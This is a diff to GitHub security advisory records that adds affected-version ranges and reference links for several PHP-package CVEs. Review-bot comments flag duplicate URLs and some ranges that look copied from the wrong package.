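Review bot: The two Fedora list URLs added in GHSA-2xhg-w2g5-w95x differ from the entries that already follow them only by `%40` versus a literal `@`, so the same announcement is now listed twice; keep one form (the existing `@` spelling matches the rest of the file) rather than both. The same percent-encoded duplicates are added in GHSA-crp2-qrr5-8pq7 and GHSA-q8hg-pf8v-cxrv, and GHSA-7mv4-4xpg-xq44 adds `https://www.silverstripe.org/download/security-releases/cve-2020-26138` beside the existing entry that ends in `/`. Consumers deduplicate references by exact string, so normalising the URL (decoding `%40`, trimming a trailing slash) before insertion would avoid these repeats across the whole batch.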
diff --git a/advisories/github-reviewed/2021/11/GHSA-q3j3-w37x-hq2q/GHSA-q3j3-w37x-hq2q.json b/advisories/github-reviewed/2021/11/GHSA-q3j3-w37x-hq2q/GHSA-q3j3-w37x-hq2q.json index bc2195c012d26..1612f75764cb9 100644 --- a/advisories/github-reviewed/2021/11/GHSA-q3j3-w37x-hq2q/GHSA-q3j3-w37x-hq2q.json +++ b/advisories/github-reviewed/2021/11/GHSA-q3j3-w37x-hq2q/GHSA-q3j3-w37x-hq2q.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q3j3-w37x-hq2q", - "modified": "2021-11-25T00:18:27Z", + "modified": "2024-02-05T11:13:47Z", "published": "2021-11-24T20:04:25Z", "aliases": [ "CVE-2021-41267" @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.2.0" + }, + { + "fixed": "5.3.12" + } + ] + } + ] } ], "references": [ @@ -52,9 +71,21 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/95dcf51682029e89450aee86267e3d553aa7c487" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/http-kernel/CVE-2021-41267.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2021-41267.yaml" + }, { "type": "WEB", "url": "https://github.com/symfony/symfony/releases/tag/v5.3.12" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2021-41267" } ], "database_specific": { diff --git a/advisories/github-reviewed/2021/11/GHSA-qw36-p97w-vcqr/GHSA-qw36-p97w-vcqr.json b/advisories/github-reviewed/2021/11/GHSA-qw36-p97w-vcqr/GHSA-qw36-p97w-vcqr.json index 4fa7f08027d21..80d63f4bc80d4 100644 --- a/advisories/github-reviewed/2021/11/GHSA-qw36-p97w-vcqr/GHSA-qw36-p97w-vcqr.json +++ b/advisories/github-reviewed/2021/11/GHSA-qw36-p97w-vcqr/GHSA-qw36-p97w-vcqr.json 
@@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.3.0" + }, + { + "fixed": "5.3.12" + } + ] + } + ] } ], "references": [ @@ -52,6 +71,14 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/36a808b857cd3240244f4b224452fb1e70dc6dfc" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-bundle/CVE-2021-41268.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2021-41268.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony" @@ -59,6 +86,10 @@ { "type": "WEB", "url": "https://github.com/symfony/symfony/releases/tag/v5.3.12" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2021-41268" } ], "database_specific": { diff --git a/advisories/github-reviewed/2021/11/GHSA-r7cj-8hjg-x622/GHSA-r7cj-8hjg-x622.json b/advisories/github-reviewed/2021/11/GHSA-r7cj-8hjg-x622/GHSA-r7cj-8hjg-x622.json index 50b2e51d8d5c5..04155386aed85 100644 --- a/advisories/github-reviewed/2021/11/GHSA-r7cj-8hjg-x622/GHSA-r7cj-8hjg-x622.json +++ b/advisories/github-reviewed/2021/11/GHSA-r7cj-8hjg-x622/GHSA-r7cj-8hjg-x622.json @@ -48,6 +48,10 @@ "type": "WEB", "url": "https://github.com/doctrine/dbal/commit/9dcfa4cb6c03250b78a84737ba7ceb82f4b7ba4d" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/doctrine/dbal/CVE-2021-43608.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/doctrine/dbal/" diff --git a/advisories/github-reviewed/2021/12/GHSA-66hf-2p6w-jqfw/GHSA-66hf-2p6w-jqfw.json b/advisories/github-reviewed/2021/12/GHSA-66hf-2p6w-jqfw/GHSA-66hf-2p6w-jqfw.json index 685e8cf1e05fd..3088d48af757c 100644 --- a/advisories/github-reviewed/2021/12/GHSA-66hf-2p6w-jqfw/GHSA-66hf-2p6w-jqfw.json 
+++ b/advisories/github-reviewed/2021/12/GHSA-66hf-2p6w-jqfw/GHSA-66hf-2p6w-jqfw.json @@ -71,6 +71,63 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "illuminate/view" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.20.42" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "illuminate/view" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.0.0" + }, + { + "fixed": "7.30.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "illuminate/view" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.75.0" + } + ] + } + ] } ], "references": [ @@ -98,6 +155,14 @@ "type": "WEB", "url": "https://github.com/laravel/framework/commit/b8174169b1807f36de1837751599e2828ceddb9b" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/illuminate/view/CVE-2021-43808.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/laravel/framework/CVE-2021-43808.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/laravel/framework" diff --git a/advisories/github-reviewed/2021/12/GHSA-jfh8-c2jp-5v3q/GHSA-jfh8-c2jp-5v3q.json b/advisories/github-reviewed/2021/12/GHSA-jfh8-c2jp-5v3q/GHSA-jfh8-c2jp-5v3q.json index 62becdd47b0e5..e97e4a448e5da 100644 --- a/advisories/github-reviewed/2021/12/GHSA-jfh8-c2jp-5v3q/GHSA-jfh8-c2jp-5v3q.json +++ b/advisories/github-reviewed/2021/12/GHSA-jfh8-c2jp-5v3q/GHSA-jfh8-c2jp-5v3q.json @@ -44,7 +44,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "2.0-beta9" }, { "fixed": "2.3.1" diff --git a/advisories/github-reviewed/2021/12/GHSA-mh9j-v6mq-pfch/GHSA-mh9j-v6mq-pfch.json b/advisories/github-reviewed/2021/12/GHSA-mh9j-v6mq-pfch/GHSA-mh9j-v6mq-pfch.json index 363ec64528d89..0c61e64f24aaf 100644 
--- a/advisories/github-reviewed/2021/12/GHSA-mh9j-v6mq-pfch/GHSA-mh9j-v6mq-pfch.json +++ b/advisories/github-reviewed/2021/12/GHSA-mh9j-v6mq-pfch/GHSA-mh9j-v6mq-pfch.json @@ -32,10 +32,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 3.0.5" - } + ] } ], "references": [ @@ -51,6 +48,14 @@ "type": "WEB", "url": "https://github.com/matyhtf/framework/commit/25084603b7ea771eebe263d39744fe6abf1f8d61" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/matyhtf/framework/CVE-2021-43676.yaml" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-mh9j-v6mq-pfch" + }, { "type": "PACKAGE", "url": "https://github.com/matyhtf/framework" diff --git a/advisories/github-reviewed/2021/12/GHSA-qphc-hf5q-v8fc/GHSA-qphc-hf5q-v8fc.json b/advisories/github-reviewed/2021/12/GHSA-qphc-hf5q-v8fc/GHSA-qphc-hf5q-v8fc.json index 7fd64b38b411d..5cdef416beb41 100644 --- a/advisories/github-reviewed/2021/12/GHSA-qphc-hf5q-v8fc/GHSA-qphc-hf5q-v8fc.json +++ b/advisories/github-reviewed/2021/12/GHSA-qphc-hf5q-v8fc/GHSA-qphc-hf5q-v8fc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qphc-hf5q-v8fc", - "modified": "2023-08-08T16:59:42Z", + "modified": "2024-02-08T12:30:47Z", "published": "2021-12-14T21:19:08Z", "aliases": [ "CVE-2021-44528" @@ -93,6 +93,10 @@ "type": "WEB", "url": "https://groups.google.com/g/ruby-security-ann/c/vG9gz3nk1pM/m/7-NU4MNrDAAJ?utm_medium=email&utm_source=footer" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240208-0003/" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5372" diff --git a/advisories/github-reviewed/2022/01/GHSA-29gp-2c3m-3j6m/GHSA-29gp-2c3m-3j6m.json b/advisories/github-reviewed/2022/01/GHSA-29gp-2c3m-3j6m/GHSA-29gp-2c3m-3j6m.json index 4d8a301160d80..32bf4acc37bc0 100644 --- a/advisories/github-reviewed/2022/01/GHSA-29gp-2c3m-3j6m/GHSA-29gp-2c3m-3j6m.json 
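Review bot: GHSA-mh9j-v6mq-pfch drops `"last_known_affected_version_range": "<= 3.0.5"` from the affected entry, but that entry's `events` list sits above the hunk, so it is not visible here whether a `fixed` event exists. If the range still carries only an `introduced` event, removing this bound turns the entry into an open-ended range and every later release of matyhtf/framework will be reported as vulnerable. Either keep the `database_specific` block or confirm a `{ "fixed": ... }` event is present before landing this.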
+++ b/advisories/github-reviewed/2022/01/GHSA-29gp-2c3m-3j6m/GHSA-29gp-2c3m-3j6m.json @@ -67,6 +67,10 @@ "type": "WEB", "url": "https://github.com/smarty-php/smarty/commit/215d81a9fa3cd63d82fb3ab56ecaf97cf1e7db71" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/smarty/smarty/CVE-2021-29454.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/smarty-php/smarty" diff --git a/advisories/github-reviewed/2022/01/GHSA-4h9c-v5vg-5m6m/GHSA-4h9c-v5vg-5m6m.json b/advisories/github-reviewed/2022/01/GHSA-4h9c-v5vg-5m6m/GHSA-4h9c-v5vg-5m6m.json index 067a884175f9b..f4b5bfa64c203 100644 --- a/advisories/github-reviewed/2022/01/GHSA-4h9c-v5vg-5m6m/GHSA-4h9c-v5vg-5m6m.json +++ b/advisories/github-reviewed/2022/01/GHSA-4h9c-v5vg-5m6m/GHSA-4h9c-v5vg-5m6m.json @@ -67,6 +67,10 @@ "type": "WEB", "url": "https://github.com/smarty-php/smarty/commit/19ae410bf56007a5ef24441cdc6414619cfaf664" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/smarty/smarty/CVE-2021-21408.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/smarty-php/smarty" diff --git a/advisories/github-reviewed/2022/01/GHSA-4rmr-c2jx-vx27/GHSA-4rmr-c2jx-vx27.json b/advisories/github-reviewed/2022/01/GHSA-4rmr-c2jx-vx27/GHSA-4rmr-c2jx-vx27.json index 44da6883f9831..1c3b4e28fe52c 100644 --- a/advisories/github-reviewed/2022/01/GHSA-4rmr-c2jx-vx27/GHSA-4rmr-c2jx-vx27.json +++ b/advisories/github-reviewed/2022/01/GHSA-4rmr-c2jx-vx27/GHSA-4rmr-c2jx-vx27.json 
@@ -44,10 +44,18 @@ "type": "WEB", "url": "https://github.com/bobthecow/mustache.php/commit/579ffa5c96e1d292c060b3dd62811ff01ad8c24e" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/mustache/mustache/CVE-2022-0323.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/bobthecow/mustache.php" }, + { + "type": "WEB", + "url": "https://github.com/bobthecow/mustache.php/releases/tag/v2.14.1" + }, { "type": "WEB", "url": "https://huntr.dev/bounties/a5f5a988-aa52-4443-839d-299a63f44fb7" diff --git a/advisories/github-reviewed/2022/01/GHSA-8cw5-rv98-5c46/GHSA-8cw5-rv98-5c46.json b/advisories/github-reviewed/2022/01/GHSA-8cw5-rv98-5c46/GHSA-8cw5-rv98-5c46.json index f6af0fa78ea56..771e6d3f4ef8e 100644 --- a/advisories/github-reviewed/2022/01/GHSA-8cw5-rv98-5c46/GHSA-8cw5-rv98-5c46.json +++ b/advisories/github-reviewed/2022/01/GHSA-8cw5-rv98-5c46/GHSA-8cw5-rv98-5c46.json @@ -71,6 +71,63 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.0.0" + }, + { + "fixed": "7.62.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.5.9" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.6.0" + }, + { + "fixed": "8.6.6" + } + ] + } + ] } ], "references": [ @@ -78,6 +135,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-6339" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/core/CVE-2019-6339.yaml" + }, { "type": "WEB", "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/drupal/CVE-2019-6339.yaml" 
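Review bot: The first `drupal/core` entry added to GHSA-8cw5-rv98-5c46 spans `"introduced": "7.0.0"` to `"fixed": "7.62.0"`, but as far as I know the Packagist package drupal/core only exists for 8.x and later and the 7.x line is published solely as drupal/drupal, so this range would never match an installed package. It looks copied from the drupal/drupal branch data in the FriendsOfPHP yaml linked in the same hunk; if drupal/core indeed has no 7.x releases, drop that entry and keep the 8.5.x and 8.6.x ranges.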
diff --git a/advisories/github-reviewed/2022/02/GHSA-5mv2-rx3q-4w2v/GHSA-5mv2-rx3q-4w2v.json b/advisories/github-reviewed/2022/02/GHSA-5mv2-rx3q-4w2v/GHSA-5mv2-rx3q-4w2v.json index bccd5a0af2699..2f079a1dbdd5b 100644 --- a/advisories/github-reviewed/2022/02/GHSA-5mv2-rx3q-4w2v/GHSA-5mv2-rx3q-4w2v.json +++ b/advisories/github-reviewed/2022/02/GHSA-5mv2-rx3q-4w2v/GHSA-5mv2-rx3q-4w2v.json @@ -71,6 +71,10 @@ "type": "WEB", "url": "https://github.com/twigphp/Twig/commit/2eb33080558611201b55079d07ac88f207b466d5" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/twig/twig/CVE-2022-23614.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/twigphp/Twig/" @@ -91,6 +95,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SIGZCFSYLPP7UVJ4E4NLHSOQSKYNXSAD/" }, + { + "type": "WEB", + "url": "https://symfony.com/blog/twig-security-release-disallow-non-closures-in-the-sort-filter" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5107" diff --git a/advisories/github-reviewed/2022/02/GHSA-fqx8-v33p-4qcc/GHSA-fqx8-v33p-4qcc.json b/advisories/github-reviewed/2022/02/GHSA-fqx8-v33p-4qcc/GHSA-fqx8-v33p-4qcc.json index 1585b8f297ac4..b89da8275b2d5 100644 --- a/advisories/github-reviewed/2022/02/GHSA-fqx8-v33p-4qcc/GHSA-fqx8-v33p-4qcc.json +++ b/advisories/github-reviewed/2022/02/GHSA-fqx8-v33p-4qcc/GHSA-fqx8-v33p-4qcc.json @@ -52,6 +52,14 @@ "type": "WEB", "url": "https://github.com/darylldoyle/svg-sanitizer/commit/17e12ba9c2881caa6b167d0fbea555c11207fbb0" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/enshrined/svg-sanitize/CVE-2022-23638.yaml" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-fqx8-v33p-4qcc" + }, { "type": "PACKAGE", "url": "https://github.com/darylldoyle/svg-sanitizer" 
diff --git a/advisories/github-reviewed/2022/02/GHSA-g44j-7vp3-68cv/GHSA-g44j-7vp3-68cv.json b/advisories/github-reviewed/2022/02/GHSA-g44j-7vp3-68cv/GHSA-g44j-7vp3-68cv.json index 3364970f1ec52..067fd87b92a63 100644 --- a/advisories/github-reviewed/2022/02/GHSA-g44j-7vp3-68cv/GHSA-g44j-7vp3-68cv.json +++ b/advisories/github-reviewed/2022/02/GHSA-g44j-7vp3-68cv/GHSA-g44j-7vp3-68cv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g44j-7vp3-68cv", - "modified": "2021-05-19T22:08:41Z", + "modified": "2024-02-02T15:59:34Z", "published": "2022-02-15T01:57:18Z", "aliases": [ "CVE-2015-3629" @@ -80,6 +80,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2021-05-19T22:08:41Z", - "nvd_published_at": null + "nvd_published_at": "2015-05-18T15:59:15Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2022/02/GHSA-grc3-8q8m-4j7c/GHSA-grc3-8q8m-4j7c.json b/advisories/github-reviewed/2022/02/GHSA-grc3-8q8m-4j7c/GHSA-grc3-8q8m-4j7c.json index 947e381910da0..2d6a057a93001 100644 --- a/advisories/github-reviewed/2022/02/GHSA-grc3-8q8m-4j7c/GHSA-grc3-8q8m-4j7c.json +++ b/advisories/github-reviewed/2022/02/GHSA-grc3-8q8m-4j7c/GHSA-grc3-8q8m-4j7c.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-grc3-8q8m-4j7c", - "modified": "2021-04-07T22:41:39Z", + "modified": "2024-01-31T15:12:56Z", "published": "2022-02-09T22:37:59Z", "aliases": [ "CVE-2020-17533" @@ -70,6 +70,10 @@ "type": "WEB", "url": "https://github.com/apache/accumulo/commit/877ad502f6857e48342664e4b0ce83db74e4cda4" }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/accumulo" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf8c1a787b6951d3dacb9ec58f0bf1633790c91f54ff10c6f8ff9d8ed%40%3Cannounce.apache.org%3E" diff --git a/advisories/github-reviewed/2022/02/GHSA-jmhf-9fj8-88gh/GHSA-jmhf-9fj8-88gh.json b/advisories/github-reviewed/2022/02/GHSA-jmhf-9fj8-88gh/GHSA-jmhf-9fj8-88gh.json index ecc4e564dc8ea..a2a3bcd315a42 100644 
--- a/advisories/github-reviewed/2022/02/GHSA-jmhf-9fj8-88gh/GHSA-jmhf-9fj8-88gh.json +++ b/advisories/github-reviewed/2022/02/GHSA-jmhf-9fj8-88gh/GHSA-jmhf-9fj8-88gh.json @@ -48,6 +48,10 @@ "type": "WEB", "url": "https://github.com/rudloff/alltube/commit/bc14b6e45c766c05757fb607ef8d444cbbfba71a" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/rudloff/alltube/CVE-2022-0692.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/Rudloff/alltube" diff --git a/advisories/github-reviewed/2022/02/GHSA-m6q5-wv4x-fv6h/GHSA-m6q5-wv4x-fv6h.json b/advisories/github-reviewed/2022/02/GHSA-m6q5-wv4x-fv6h/GHSA-m6q5-wv4x-fv6h.json index 72984dd1f43a5..ba5efdd3ef131 100644 --- a/advisories/github-reviewed/2022/02/GHSA-m6q5-wv4x-fv6h/GHSA-m6q5-wv4x-fv6h.json +++ b/advisories/github-reviewed/2022/02/GHSA-m6q5-wv4x-fv6h/GHSA-m6q5-wv4x-fv6h.json @@ -71,6 +71,63 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.8.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.9.0" + }, + { + "fixed": "8.9.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.0.6" + } + ] + } + ] } ], "references": [ 
@@ -90,6 +147,14 @@ "type": "WEB", "url": "https://github.com/drupal/core/commit/d4be028d81fb6b067513d788b60c3e6fc8fbd0a2" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/core/CVE-2020-13668.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/drupal/CVE-2020-13668.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/drupal/core" diff --git a/advisories/github-reviewed/2022/02/GHSA-mmjr-5q74-p3m4/GHSA-mmjr-5q74-p3m4.json b/advisories/github-reviewed/2022/02/GHSA-mmjr-5q74-p3m4/GHSA-mmjr-5q74-p3m4.json index 446e41b13c33f..0743888dffd56 100644 --- a/advisories/github-reviewed/2022/02/GHSA-mmjr-5q74-p3m4/GHSA-mmjr-5q74-p3m4.json +++ b/advisories/github-reviewed/2022/02/GHSA-mmjr-5q74-p3m4/GHSA-mmjr-5q74-p3m4.json @@ -71,6 +71,63 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.8.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.9.0" + }, + { + "fixed": "8.9.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.0.6" + } + ] + } + ] } ], "references": [ @@ -82,6 +139,14 @@ "type": "WEB", "url": "https://github.com/drupal/core/commit/f93a37b713b59f8d24e826bc74378099853eef3d" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/core/CVE-2020-13670.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/drupal/CVE-2020-13670.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/drupal/core" 
diff --git a/advisories/github-reviewed/2022/02/GHSA-pj4j-287j-f742/GHSA-pj4j-287j-f742.json b/advisories/github-reviewed/2022/02/GHSA-pj4j-287j-f742/GHSA-pj4j-287j-f742.json index f7949f160e534..83a04e84114b8 100644 --- a/advisories/github-reviewed/2022/02/GHSA-pj4j-287j-f742/GHSA-pj4j-287j-f742.json +++ b/advisories/github-reviewed/2022/02/GHSA-pj4j-287j-f742/GHSA-pj4j-287j-f742.json @@ -15,6 +15,63 @@ } ], "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.4.18" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.5.0" + }, + { + "fixed": "4.5.8" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/core-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.4.18" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", @@ -25,10 +82,48 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "4.5.0" }, { - "fixed": "4.5.7" + "fixed": "4.5.8" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.5.35" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/core-bundle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.5.35" } ] } 
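Review bot: The last entry added to GHSA-pj4j-287j-f742 gives contao/core-bundle the range `"introduced": "3.0.0"` to `"fixed": "3.5.35"`, mirroring the contao/core entry directly above it; as far as I know core-bundle only exists from Contao 4.0 onward, so this range would match nothing and looks like a copy of the contao/core branch. Confirm against the contao/core-bundle yaml linked in the references hunk and drop the entry if it has no 3.x branch. The entry whose bounds change from `"0"`/`"4.5.7"` to `"4.5.0"`/`"4.5.8"` has its package name above the hunk, so I cannot tell from here which package that modification belongs to.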
@@ -40,9 +135,29 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-10125" }, + { + "type": "WEB", + "url": "https://contao.org/en/news/contao-3_5_35.html" + }, + { + "type": "WEB", + "url": "https://contao.org/en/news/contao-4_4_18.html" + }, { "type": "WEB", "url": "https://contao.org/en/security-advisories/cross-site-scripting-in-the-system-log.html" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/contao/CVE-2018-10125.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/core-bundle/CVE-2018-10125.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/core/CVE-2018-10125.yaml" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/02/GHSA-vvmr-8829-6whx/GHSA-vvmr-8829-6whx.json b/advisories/github-reviewed/2022/02/GHSA-vvmr-8829-6whx/GHSA-vvmr-8829-6whx.json index 534db57c10a79..ab29419e753ee 100644 --- a/advisories/github-reviewed/2022/02/GHSA-vvmr-8829-6whx/GHSA-vvmr-8829-6whx.json +++ b/advisories/github-reviewed/2022/02/GHSA-vvmr-8829-6whx/GHSA-vvmr-8829-6whx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vvmr-8829-6whx", - "modified": "2022-02-07T22:11:10Z", + "modified": "2024-02-06T17:08:59Z", "published": "2022-02-01T00:46:57Z", "aliases": [ "CVE-2022-23601" 
@@ -80,6 +80,72 @@ "versions": [ "6.0.3" ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.3.14" + }, + { + "fixed": "5.3.15" + } + ] + } + ], + "versions": [ + "5.3.14" + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.4.3" + }, + { + "fixed": "5.4.4" + } + ] + } + ], + "versions": [ + "5.4.3" + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.3" + }, + { + "fixed": "6.0.4" + } + ] + } + ], + "versions": [ + "6.0.3" + ] } ], "references": [ @@ -95,9 +161,21 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/f0ffb775febdf07e57117aabadac96fa37857f50" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/framework-bundle/CVE-2022-23601.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2022-23601.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony/" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2022-23601" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/03/GHSA-2mgj-mwvf-mpg5/GHSA-2mgj-mwvf-mpg5.json b/advisories/github-reviewed/2022/03/GHSA-2mgj-mwvf-mpg5/GHSA-2mgj-mwvf-mpg5.json new file mode 100644 index 0000000000000..d9b7fbb0485ec --- /dev/null +++ b/advisories/github-reviewed/2022/03/GHSA-2mgj-mwvf-mpg5/GHSA-2mgj-mwvf-mpg5.json 
@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2mgj-mwvf-mpg5", + "modified": "2024-01-30T22:05:12Z", + "published": "2022-03-30T00:00:24Z", + "aliases": [ + "CVE-2022-28144" + ], + "summary": "Missing permission checks in Jenkins Proxmox Plugin ", + "details": "Jenkins Proxmox Plugin 0.7.0 and earlier does not perform a permission check in several HTTP endpoints, allowing attackers with Overall/Read permission to connect to an attacker-specified host using attacker-specified username and password (perform a connection test), disable SSL/TLS validation for the entire Jenkins controller JVM as part of the connection test (see CVE-2022-28142), and test a rollback with attacker-specified parameters.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + 